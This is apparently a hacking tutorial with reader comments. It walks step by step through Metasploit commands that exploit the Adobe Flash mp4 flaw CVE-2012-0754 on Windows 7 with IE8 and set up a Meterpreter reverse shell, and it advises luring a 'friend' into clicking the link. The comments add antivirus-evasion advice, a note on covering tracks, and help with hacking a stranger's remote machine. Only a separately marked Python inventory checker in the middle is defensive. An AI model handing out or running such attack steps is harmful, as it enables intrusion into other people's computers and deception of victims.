Hack Like a Pro: How to Exploit Adobe Flash with a Corrupted Movie File to Hack Windows 7

Welcome back, my greenhorn hackers!

In my continuing effort to demonstrate to you how to hack the ubiquitous Windows 7, we will be going after that notoriously vulnerable Adobe Flash that is on nearly every client Windows system (you are not likely to find it on servers).

Flash and the other Adobe products have had a reputation for shoddy and insecure design for quite a while now. The problem is so bad that Apple will not allow Flash on its iOS operating system, angering many users but keeping iOS more secure and energy efficient (when Flash crashes, it sucks up energy from the battery—and it crashes often, as we all know too well).

In an earlier tutorial, I showed you how to find vulnerabilities by using the SecurityFocus database. Let's go there again and take a look at the Adobe Flash vulnerabilities.

Step 1: Search Vulnerabilities

When we go to www.securityfocus.com and search the database for Adobe and then Flash Player, we get 8 pages of vulnerabilities with 20 vulnerabilities per page. It's obvious from this listing that Flash is riven with security problems. We could spend weeks going through all the Adobe Flash Player vulnerabilities, but I'll leave that for you to do.

If you are looking to attack a client machine on a network, you would be well-served to spend your time focused on Adobe Flash. There are so many vulnerabilities and new ones arrive daily!

Step 2: Pick One

Let's take a look at one vulnerability known as CVE-2012-0754, a remote memory corruption. It was found in the wild back in February 2012 and involves using a corrupted .mp4 file to create a buffer overflow in Flash that enables the attacker to execute their own code. Note that it works for Adobe Flash Player through 11.1.

When we click on the "exploit" tab at the top of the page, it takes us to a link to the exploit. We can then download or copy and paste that exploit for use.

Step 3: Use Metasploit

Let's open Metasploit and find the exploits built to take advantage of the Adobe Flash Player vulnerabilities. Search for "flash" using the following command.

  • msf > search flash

When I do so, I find numerous Flash exploits, but I have highlighted the one we are using here; it corresponds to CVE-2012-0754. Now let's use it.

  • msf > use exploit/windows/browser/adobe_flash_mp4_cprt

When we do that, it will load the exploit into the console. Now let's get more info on it.

  • msf > info

Metasploit returns for us some basic info on the exploit. I have highlighted the description in the screenshot above. In this info, we can also see that this exploit has "targets". To get the most reliable results, you want to set the target.

In our case here, we are going after Windows 7 with IE8 (remember, IE8 came as default on Windows 7 and is still the most widely used browser with 21.2% of the market), so we set the target to 6.

  • msf > set target 6

Step 4: Set Options

Next we need to set our options. We can see the options by typing:

  • msf > show options

We need to set the SRVHOST (the address the exploit's web server listens on) and the payload at a minimum. We could also set the SRVPORT, the URIPATH, and the SSL settings, but we will leave these at their defaults here.

  • msf > set SRVHOST 192.168.1.104
  • msf > set payload windows/meterpreter/reverse_tcp

Once we set the payload, we once again need to check the options, as payloads have their own set of options. When we do so, we see that we need to set the LHOST (the IP of our local host) for the Meterpreter reverse connection.

  • msf > set LHOST 192.168.1.104

Step 5: Exploit!

With all the parameters we need set, all we need to do is type:

  • msf > exploit

This will now generate a corrupted .mp4 file and will host it on the Metasploit web server. Now we need to be creative and send that link to the victim and hope they click on it. For instance, you could send it to a "friend" saying "Hey, check out this great new hack I found on Null Byte!"

When they click on it, Metasploit will send the .mp4 file to their browser, creating a buffer overflow, as seen below.

With a bit of luck (this exploit doesn't work 100% of the time, more like 50%), you will be rewarded with the meterpreter prompt and you will own his or her system!
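From the defender's side, the two facts this tutorial relies on are an unpatched Flash Player (through 11.1, per Step 2) and IE8 or earlier as the browser. The Python below is added here and is not part of the original post: it turns those two facts into an exposure check that an inventory script could run over collected version strings. The record field names, the version-string formats and the sample hosts are constructed for the example.

```python
import re
# Exposure window as stated in this tutorial: Flash Player through 11.1 and IE8
# or earlier.  Exact fixed builds come from the vendor advisory, not this post, so
# the check is coarse (major.minor) and conservative: 11.1.x is flagged until verified.
FLASH_MAX_EXPOSED = (11, 1)
IE_MAX_EXPOSED = 8

def parse_version(text):
    """Parse a version string into a tuple of ints.
    Accepts dotted ("11.1.102.55") and Flash's comma form ("WIN 11,1,102,55");
    returns None when no numeric version is present."""
    m = re.search(r'(\d+(?:[.,]\d+)*)', text or '')
    if not m:
        return None
    return tuple(int(p) for p in re.split(r'[.,]', m.group(1)))

def flash_exposed(flash_version):
    v = parse_version(flash_version)
    if v is None:
        return False  # Flash not installed: this bug does not apply
    return v[:2] <= FLASH_MAX_EXPOSED

def ie_exposed(ie_version):
    v = parse_version(ie_version)
    return v is not None and v[0] <= IE_MAX_EXPOSED

def assess_host(host):
    """Classify one inventory record (field names 'flash' and 'ie' are assumed)."""
    flash, ie = flash_exposed(host.get('flash')), ie_exposed(host.get('ie'))
    if flash and ie:
        return 'exposed'         # the Windows 7 / IE8 combination this post targets
    if flash:
        return 'flash-outdated'  # different browser, but Flash still needs patching
    return 'ok'

# Constructed sample inventory, not real hosts.
INVENTORY = [
    {'name': 'ws01', 'flash': 'WIN 11,1,102,55', 'ie': '8.0.7601.17514'},
    {'name': 'ws02', 'flash': '11.2.202.228', 'ie': '8.0.7601.17514'},
    {'name': 'ws03', 'flash': '10.3.183.15', 'ie': '11.0.9600.16428'},
    {'name': 'ws04', 'flash': None, 'ie': '8.0.7601.17514'},
]

def report(inventory=INVENTORY):
    return {h['name']: assess_host(h) for h in inventory}

if __name__ == '__main__':
    for name, status in report().items():
        print(f'{name}: {status}')
```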

Hacking into modern operating systems is becoming more and more difficult as Microsoft and other software vendors become more security focused. The vigilant hacker can ALWAYS find a way in, if they are persistent and creative.

Sources such as SecurityFocus and other vulnerability databases (even Microsoft's own) are constantly logging vulnerabilities and the effective hacker simply needs to stay one step ahead of the software vendors.

27 Comments

Great post! Phew, finally. I have read and practiced each of your tutorials, not counting the ones listed as "other", and must say that I am impressed. I have a few questions if you have the time.

I have been using Ubuntu and have downloaded each of the hacks as needed, which has been a great learning experience for me, as this has caused me to have to learn some Linux at the same time to get them to actually run.

I would highly recommend this to other noobs rather than just using backtrack.

But I will be installing Kali and am going to do it on a small partition, as it will make it quicker and easier to wipe my drive as needed (cover my deleted tracks). Is this advisable? Or would you recommend a flash drive even though you can't get updates?

The exploits that are new for new vulnerabilities, should those still be recompiled to escape virus detection? Or are they "safe", meaning the signatures have not been updated yet?

Thanking you in advance
a hopefully improving noob

Jon:

Welcome to Null Byte! I'm glad you are finding these tutorials helpful.

I advise installing Kali or BackTrack either as a dual boot or in a VM. Any exploit that has been around more than a few months will have a signature in the AV database. The AV people do their job.

As for checking whether a signature exists, simply run the exploit against your AV and see if it detects it. That should be a good test, unless you have really poor AV. Most of the AV software publishers use the same signatures.

OTW

Oops, sorry, never mind. I started looking through the "everything else" sections. My questions will probably be answered there. I think I will just go to the forum and start with the first thread there and work my way forward. I notice the forum has all the articles listed with the extra forum threads, so it should be a gold mine of information. I will post again once I work through all the threads and practices listed there. :)

Thanks again.

How do I hack a Windows 98/Windows XP machine that is not in my LAN and lives in another state? Plus, I have the IP, but I don't want him to open an application or go to a website, so how would I hack him? BTW, I can make him go to a website that allows me to get into his PC, but I prefer not to.

Qadeem:

Those OSes are easy to hack. Have you read my XP tutorial or any of those using MS08-067? The victim only needs to be online.

OTW

Ooh, can you give me a link, or tell me, have you made a how-to yet?

Yes, just put the info in the search window.

I just started a network security degree and I tested this exploit. But the person who I had click on my generated link was not able to connect to it. I am sure it is something simple that I am just overlooking, but could someone please help me out?

Hi OTW,

I'm a real noob, but I managed to install Kali on my laptop. I've tested several exploits on my laptop (HP, Windows 7); actually, none of the exploits you have explained worked :/. We're on the same LAN and I do see his connection on my terminal, but it always freezes/stops after the first steps. The furthest I got was "Sending ADP (or something like that) to client" using a Silverlight exploit (http://www.scip.ch/en/?vuldb.12529). Could you please make some suggestions?

Bart (I'm sorry for my bad English)

Bart:

It's hard to diagnose what might be wrong with so little info. First, are you sure that the target machine has the vulnerability you are trying to exploit?

OTW

Yes, I'm sure it has the vulnerabilities which I tested.

Bart

Bart, your certainty is worrisome. Have you done the proper recon?

Let's work with one hack at a time and see what is happening.

Hi OTW,

Because your Windows 7 tutorials are still too advanced for me, I'm trying to pwn a Windows XP virtual machine (Windows XP Professional, SP3, Windows Firewall off, no updates, wifi set to bridged mode). I'm using your guide (using the RPC DCOM, MS03-026). My Metasploit just gets stuck on 'Sending exploit ...'. Because my explanations are always very confusing, I've made an imgur album with screenshots: [removed]. I would love it if you could give me some suggestions.

Bart

Bart:

I do not click on links sent to me from people I don't know, and you shouldn't either. That is one of the easiest ways to hack someone's computer.

Please, instead, post your screenshots here in this forum, so that others can learn and help.

OTW

Sure, here they are:

I think it maybe has something to do with my router. Should I port forward certain ports?

Bart:

You did a great job here! Looks like you did everything right. It might be that the Windows XP you are using has been patched. Can you get an earlier version of XP?

OTW

Well, I tried Service Pack 2, but I got the exact same results as before... I searched Google for this bug (MS03-026) and I got to the Microsoft page; there it says every version of Windows XP is vulnerable. I'm downloading Windows XP with no service packs, but it's pretty slow. I'll keep you up to date.

Bart

(PS: I made some new screenshots when I tested SP2.)

I can't find any changes though :(.

Success!

I finally did it! I didn't use your exploit, but I used the 'Aurora' bug. I know it's way outdated (only affects IE 6), but I just wanted to test if I could even get a Meterpreter session. Now I'm going to "level up" by finding exploits for updated IEs and other exploits! My success:

It was awesome!

Bart

Congratulations Bart! I'm proud of you and your persistence. You have the makings of a hacker ;-)

Every time I exploit, I get "Handler failed to bind to **** Started reverse handler on 0.0.0.0.444". What happened?

OTW

Great tutorial, but I would like to know something: the link I'm supposed to send, is it this: "using URL: HTTP: //0.0.0.0:8080/****", as I can see on your screenshot?

OTW

SUCCCCCEEEESSSSS! Finally I did it, thanks again. It was another one, but I have a question: so far this tutorial only works with IE8, right? Because I tried on IE 11, so Microsoft Security Essentials locked the website, but I can see on my computer when the server started after the lock at this moment: {} *** (IP address) adobe_flash_mp4_cprt - Sending HTML

Yes, this only works with IE8 and earlier.

I'm stuck at the send process. Any info why it happened?

Man, now you cleared my thoughts. I can't thank you more!
